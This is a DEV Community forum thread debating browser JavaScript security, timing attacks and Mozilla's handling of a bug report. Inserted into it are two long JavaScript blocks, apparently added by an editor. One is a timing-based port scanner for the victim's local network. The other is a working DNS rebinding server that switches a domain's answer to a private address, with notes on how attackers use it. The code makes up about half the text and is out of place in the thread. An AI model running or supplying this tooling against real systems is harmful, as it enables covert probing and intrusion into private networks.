DEV Community

Discussion on: The Meltdown of the Web.

Giacomo Tesio • Edited

> What you're doing is boiling the whole web ecosystem down to a single aspect, and then being rather aggressive with people who aren't.

Aggressive? Honestly, I do not think so.

The attack here is a quick and dirty hack that doesn't even work against all private networks, but it shows pretty well what is at stake.

And it's really just one of the possible attacks!

> There are billions of users who would get what would feel to them like a broken web, because of an issue that will most likely never affect them.

It all depends on how good the UI is.

Many react to these solutions as if I were suggesting leaving the UI unchanged. AFAIK, no standard dictates that you have to edit about:config to disable JavaScript.

And yet the UI to opt out of JavaScript is way worse than the worst GDPR-compliance attempts I've seen so far. This is not a UI design error. This is a deliberate choice.

It turns out that such a choice is a sort of "insecurity through obscurity": most people are forced to execute code controlled by strangers because they do not know how to avoid that. AND because you cannot avoid it on a web site you do not trust and allow it on one you trust.

> It's not even that useful to make it opt-in, since if 99.999% of pages will give you a pop-up to opt in, people will just learn to click it without hesitation?

You largely overestimate the amount of the web that truly needs JavaScript.

The simple fact that people would have to opt in to JavaScript would drastically reduce the number of sites that use it. Web developers would start to test the web without JavaScript too; CSS and HTML would progress faster than they currently do and we would have an overall faster and safer web.

Just like the GDPR, opt-in JavaScript would improve the quality of the Web.

Because a lot of people that now have NO CHOICE but to run JS, would have a choice.

> Any software that gets a sizable user base becomes hard to maintain, because no issue is ever just a programming issue.

After 20 years in the field, I think I got it pretty well. ;-)

But whenever I made an error (even expensive ones, in the early design phase) that opened a serious vulnerability for my users, I had to fix it as soon as possible. And frankly, when asked about the issue by a customer, I've always explained the issue clearly, explaining ALL the implications. I can assure you that it has never been pleasant. But it was the ONLY thing to do.

Here Mozilla is not even saying whether its users are vulnerable to this whole class of attacks.

This is the problem that, IMHO, breaks the Web.

Mozilla claims to care about user privacy. People trust them.

> Calling people who do that work "clowns" is just disrespectful.

Good point. You are right.

Maybe after being called "troll" and "absurd" by people who don't seem to understand the issue I got a bit... "annoyed". I sincerely apologize.

Yet, I really do think that we should NOT need PR to get a severe vulnerability fixed. That's a bad sign about our entire field.

[Comment deleted]

Giacomo Tesio • Edited

Very interesting.

Let me clarify: I think it is ridiculous (for software engineering as a whole) that we need marketing or propaganda to get a bug like Heartbleed fixed. And it's even more ridiculous because it doesn't work, or... maybe... did you get a repaired processor for free?

If you didn't, you are right and I sincerely apologize to all professional clowns for comparing them to the state of our field! They are artists! They make us laugh... on purpose!

I didn't mention JS-blocking extensions (e.g. NoScript) to avoid asking you to read the bug report more carefully. Since you insist... please read the bug report more carefully. AFAIK they wouldn't prevent these attacks, unless you totally disable JavaScript everywhere. Remember, the JavaScript can be "customized" after gaining your trust! Also, installing such extensions assumes you already understand the risks (which so far browser vendors have not admitted), while most people do not understand them. As programmers, it's up to us to build secure software, like it's up to civil engineers to build safe bridges.

The same goes for HTTPS: anyone can buy a certificate, these attacks leave no evidence and they can target a single specific person among thousands of users of a web site.

Now... are you going to pretend that my sarcasm here can justify the silence of Mozilla?

> And honestly, I still can't see how this affects people who aren't attacked by actors with massive resources [...]

If you can't think of cheap attacks, please trust me: there's no need for massive resources.

All you need is to attract the victim on a website you control.

But even if you were right about this (and you are not), you should also consider another important aspect of this vulnerability: if you were an actual criminal you could use the mere existence of these undetectable attacks to gain plausible deniability.

Even if these attacks were "only" putting users' privacy at risk (and they are not), this is something no legal system can allow.

[Comment deleted]

Giacomo Tesio

Caught! :-D

Now that you have called me "arrogant", you could consider going back to the bug reports I wrote and to the related Lobste.rs thread and counting how many dismissive, condescending and insulting responses I got. Try to count how many times it has been said that I was trolling, how many times it has been said that I was absurd or bizarre.

Compare them with my responses.

Have I ever called someone Troll? Absurd? Bizarre?

Even in my responses to Frederik Braun, who first began with "Okay, I'll bite." and later explained to me what "Turing complete" means, I just kept asking a single question: are Firefox users vulnerable to such attacks?

That's because all I care about are the people that can be damaged by these attacks.

I find it disturbing that a programmer like me doesn't have the balls to answer such an important question that affects millions of people.

Thus, sorry for my previous comment. Really.

It was intentionally abrasive just to make you understand a little how I feel.

defel

> The attack here is a quick and dirty hack that doesn't even work against all private networks, but it shows pretty well what is at stake.

> And it's really just one of the possible attacks!

Can you provide a proof-of-concept? I read the linked articles but I'm unable to follow your logic.

Giacomo Tesio • Edited

You can find a quick & dirty PoC here
(very quick, it took a few minutes to write)
It shows how to discover the TCP ports open on your PC despite it being behind a firewall and a proxy. It was rapidly tested on a few networks (professionally configured by senior sysadmins) and it worked fine, but it doesn't work everywhere.

Rain1 has built a nicer exploit that leaks your private network topology here.

With a similar timing attack against the cache, you can discover whether a user visited a certain 3rd-party page, deducing his sexual tastes or his political orientation despite CORS, sandboxing and all the other stuff that Mozilla set up to "protect users' privacy".

The problem is that the number of exploits is potentially unbounded; it would take too much time to write them all. But if you know a little about web development, it's pretty fun to invent new ones!
Just please, add them to the bug report for future reference.

And remember: the web site or CDN can serve this malicious JS to a single person and then override it thanks to Cache-Control, leaving no evidence of the attack.

The best security door cannot protect a house without walls.
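The timing heuristic behind the port-discovery PoC described above, as an added example written for this edit (it is not the PoC from the bug report, nor Rain1's exploit). It assumes the page's origin already resolves to the target host (via DNS rebinding or, as in the quick PoC, an /etc/hosts entry); the thresholds and the fake latency table are illustrative values constructed here, not measurements, and the fake probe exists only so the block runs offline:

```javascript
'use strict';
// Added example: classify a TCP port on the victim's host from the timing of a
// cross-origin fetch. Assumptions (ours, not the thread's): the origin already
// points at the target host, and the thresholds below are illustrative and must
// be calibrated per browser and network.

const CLOSED_MAX_MS = 20;        // a refused connection (RST) fails almost at once
const PROBE_TIMEOUT_MS = 2000;   // slower than this: SYN dropped by a firewall

// Pure decision logic: what one measured probe tells us about the port.
function classifyTiming({ elapsedMs, timedOut }, closedMaxMs = CLOSED_MAX_MS) {
  if (timedOut) return 'filtered';                // neither RST nor SYN-ACK in time
  if (elapsedMs <= closedMaxMs) return 'closed';  // fast failure: connection refused
  return 'open';                                  // handshake done; request then failed or came back opaque
}

// One real probe. mode:'no-cors' makes the response opaque: the script never
// sees a body or status, only how long the promise takes to settle.
async function timedProbe(host, port, timeoutMs = PROBE_TIMEOUT_MS, fetchImpl = globalThis.fetch) {
  const ctrl = new AbortController();
  const timer = setTimeout(() => ctrl.abort(), timeoutMs);
  const t0 = performance.now();
  let timedOut = false;
  try {
    await fetchImpl(`http://${host}:${port}/`, { mode: 'no-cors', cache: 'no-store', signal: ctrl.signal });
  } catch (e) {
    timedOut = ctrl.signal.aborted;
  } finally {
    clearTimeout(timer);
  }
  return { elapsedMs: performance.now() - t0, timedOut };
}

// Scan a list of ports sequentially (parallel probes share the browser's
// connection pool and skew each other's timings).
async function scanPorts(host, ports, { probe = timedProbe, timeoutMs = PROBE_TIMEOUT_MS } = {}) {
  const result = {};
  for (const port of ports) {
    result[port] = classifyTiming(await probe(host, port, timeoutMs));
  }
  return result;
}

// Constructed, offline stand-in for the network so this block runs anywhere:
// port -> milliseconds until the attempt failed (null = never answered).
const FAKE_LATENCY_MS = { 22: 45, 80: 60, 8080: 3, 9999: null };
async function fakeProbe(host, port, timeoutMs) {
  const ms = FAKE_LATENCY_MS[port];
  const wait = ms === null ? timeoutMs : ms;
  await new Promise((resolve) => setTimeout(resolve, wait));
  return { elapsedMs: wait, timedOut: ms === null };
}

scanPorts('127.0.0.1', [22, 80, 8080, 9999], { probe: fakeProbe, timeoutMs: 100 })
  .then((r) => console.log(r)); // { '22': 'open', '80': 'open', '8080': 'closed', '9999': 'filtered' }
```

classifyTiming is the part worth calibrating in a real run; the three outcomes map to the three things a TCP stack can do with a SYN (refuse, accept, drop). The caveats are the reasons the reply above says the PoC "doesn't work everywhere": Chromium refuses a fixed list of ports before any connection is made (ERR_UNSAFE_PORT), so those fail fast whatever their state; a browser configured with an explicit HTTP proxy hands the connection to the proxy, so the timing reflects the proxy rather than the target; and a firewall that answers with RST instead of silently dropping makes 'closed' and 'filtered' indistinguishable.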

defel

Ok, it seems that we have different understandings of the terms attack and exploit.

First PoC: Updating my /etc/hosts to allow a bad script to do bad things? Nope.

Second PoC: Just did not get it working.

Yes, there were several cases in the past: getting the link colour of visited links in CSS, using CSS3 transparency to get your Facebook profile name... just to name a few.

All of them were handled as serious bugs and got fixed fast.

So, if you have a bug and you can demonstrate it, nice. If you want to discuss things, then I think this is the right place, I guess.

After writing this: I still have a different opinion on this topic and think it's wrong to blame Mozilla. They have proved many times in the past that they value privacy and security.

Giacomo Tesio • Edited

> First PoC: Updating my /etc/hosts to allow a bad script to do bad things? Nope.

Yes we have very different understanding of network security.

Do you know what DNS rebinding is?

I hope Mozilla knows.
Actually I hope Mozilla developers can deduce at least all the attacks I can conceive from the description I wrote in the bug report.

> Second PoC: Just did not get it working.

The fact that it does not work on your specific machine/network doesn't mean much.

It's a proof-of-concept. It works. Tweak it a little.

Rain1 even explained carefully how it works.

> After writing this: I still have a different opinion on this topic and think it's wrong to blame Mozilla. They have proved many times in the past that they value privacy and security.

As I wrote in the thread suggested by Mozilla to discuss the issue (now censored on Lobste.rs) I used to trust them too.

But I do not trust them anymore. That's just empty marketing.

To prove me wrong, to prove they deserve the trust of their users, there's just one thing they have to do: tell everybody the answer to this question:

Are Firefox users vulnerable to the wide class of attacks described in that bug report?

People deserve the same answer from Google, Microsoft and Apple, but at least they do not blether that they care about users' privacy.
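DNS rebinding, which the reply above names as the step the /etc/hosts entry was standing in for in the quick PoC, as an added example written for this edit (it is not code from the bug report, from Rain1's exploit, or from any browser vendor). It assumes an attacker-controlled zone rebind.example, a public web server at 203.0.113.10 (an RFC 5737 documentation address) and 127.0.0.1 as the target on the victim's machine; the query packets in the demo are constructed here, and the optional UDP transport is not started automatically:

```javascript
'use strict';
// Added example: a minimal DNS rebinding responder. The first lookup of a
// per-victim name gets the attacker's public IP (so the page loads from it);
// every later lookup, thanks to TTL 0, gets a private address, so scripts on
// the still-unchanged rebind.example origin now reach a host on the victim's
// network. Assumptions (ours): zone, addresses and hostnames below.

// Build an A query as the victim's resolver would send it.
function buildQuery(id, name) {
  const header = Buffer.alloc(12);
  header.writeUInt16BE(id, 0);
  header.writeUInt16BE(0x0100, 2);   // RD=1, standard query
  header.writeUInt16BE(1, 4);        // QDCOUNT=1
  const labels = name.split('.').map((l) => Buffer.concat([Buffer.from([l.length]), Buffer.from(l, 'ascii')]));
  const tail = Buffer.alloc(5);      // root label, QTYPE=A, QCLASS=IN
  tail.writeUInt16BE(1, 1);
  tail.writeUInt16BE(1, 3);
  return Buffer.concat([header, ...labels, tail]);
}

// Parse the header id and the question section of a query.
function parseQuestion(msg) {
  const id = msg.readUInt16BE(0);
  const labels = [];
  let off = 12;
  for (;;) {
    const len = msg[off];
    if (len === 0) { off += 1; break; }
    if (len & 0xC0) throw new Error('compressed name in question'); // not expected in a query
    labels.push(msg.subarray(off + 1, off + 1 + len).toString('ascii'));
    off += 1 + len;
  }
  return { id, name: labels.join('.'), qtype: msg.readUInt16BE(off), qclass: msg.readUInt16BE(off + 2),
           question: msg.subarray(12, off + 4) };
}

// Answer with one A record. TTL 0 tells the client not to cache it, which is
// exactly what a rebinding attacker wants.
function buildAResponse(query, ipv4, ttl) {
  const q = parseQuestion(query);
  const header = Buffer.alloc(12);
  header.writeUInt16BE(q.id, 0);
  header.writeUInt16BE(0x8180, 2);   // QR=1, RD=1, RA=1, RCODE=0
  header.writeUInt16BE(1, 4);        // QDCOUNT
  header.writeUInt16BE(1, 6);        // ANCOUNT
  const rr = Buffer.alloc(16);
  rr.writeUInt16BE(0xC00C, 0);       // name: pointer to the question name at offset 12
  rr.writeUInt16BE(1, 2);            // TYPE A
  rr.writeUInt16BE(1, 4);            // CLASS IN
  rr.writeUInt32BE(ttl, 6);
  rr.writeUInt16BE(4, 10);           // RDLENGTH
  ipv4.split('.').forEach((octet, i) => { rr[12 + i] = Number(octet); });
  return Buffer.concat([header, q.question, rr]);
}

// Client side for the demo: read back the single A record our responses carry.
function decodeAResponse(msg) {
  const n = msg.length;
  return { id: msg.readUInt16BE(0), ttl: msg.readUInt32BE(n - 10), ip: Array.from(msg.subarray(n - 4)).join('.') };
}

// Rebinding policy: count lookups per name; first gets public, the rest private.
class RebindingPolicy {
  constructor(zone, publicIp, privateIp) {
    this.zone = zone; this.publicIp = publicIp; this.privateIp = privateIp;
    this.lookups = new Map();
  }
  answerFor(name) {
    if (!name.endsWith(this.zone)) return null;   // not our zone: no answer
    const count = (this.lookups.get(name) || 0) + 1;
    this.lookups.set(name, count);
    return { ip: count === 1 ? this.publicIp : this.privateIp, ttl: 0 };
  }
}

function respond(policy, query) {
  const q = parseQuestion(query);
  if (q.qtype !== 1) return null;
  const a = policy.answerFor(q.name);
  return a ? buildAResponse(query, a.ip, a.ttl) : null;
}

// Optional UDP transport (not started here): serve the policy on a port.
async function startRebindingServer(policy, port) {
  const { createSocket } = await import('node:dgram');
  const sock = createSocket('udp4');
  sock.on('message', (msg, rinfo) => {
    const reply = respond(policy, msg);
    if (reply) sock.send(reply, rinfo.port, rinfo.address);
  });
  sock.bind(port);
  return sock;
}

// Demo with constructed packets: two consecutive lookups of the same victim-specific name.
const demoPolicy = new RebindingPolicy('rebind.example', '203.0.113.10', '127.0.0.1');
const demoFirst = decodeAResponse(respond(demoPolicy, buildQuery(0x1234, 'victim1.rebind.example')));
const demoSecond = decodeAResponse(respond(demoPolicy, buildQuery(0x1235, 'victim1.rebind.example')));
console.log(demoFirst, demoSecond); // ip 203.0.113.10 then 127.0.0.1, ttl 0 on both
```

The per-victim subdomain matters: the lookup counter is keyed by name, so each target gets its own "first" answer and the attacker can serve the malicious script to a single person, as the thread notes. Browsers keep their own short positive DNS cache regardless of TTL, so a real attacker waits it out before the page's script starts talking to the target; the page's origin is still rebind.example throughout, so the same-origin policy never sees a cross-origin request. The standard defences are on the other side: a local service that checks the Host header refuses a request carrying rebind.example, and resolvers such as dnsmasq can drop answers that point into private ranges (--stop-dns-rebind).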

Arne Babenhauserheide • Edited

Exactly this vulnerability is why we try to get Freenet users to use Freenet as proxy with random local IP (127.x.y.z) and PORT.

That way an attacker needs roughly 200 billion requests on average to find the local service (using only 5001..32000 as ports, because they are sure not to be ephemeral).

See d6.gnutella2.info/freenet/USK@sUm3...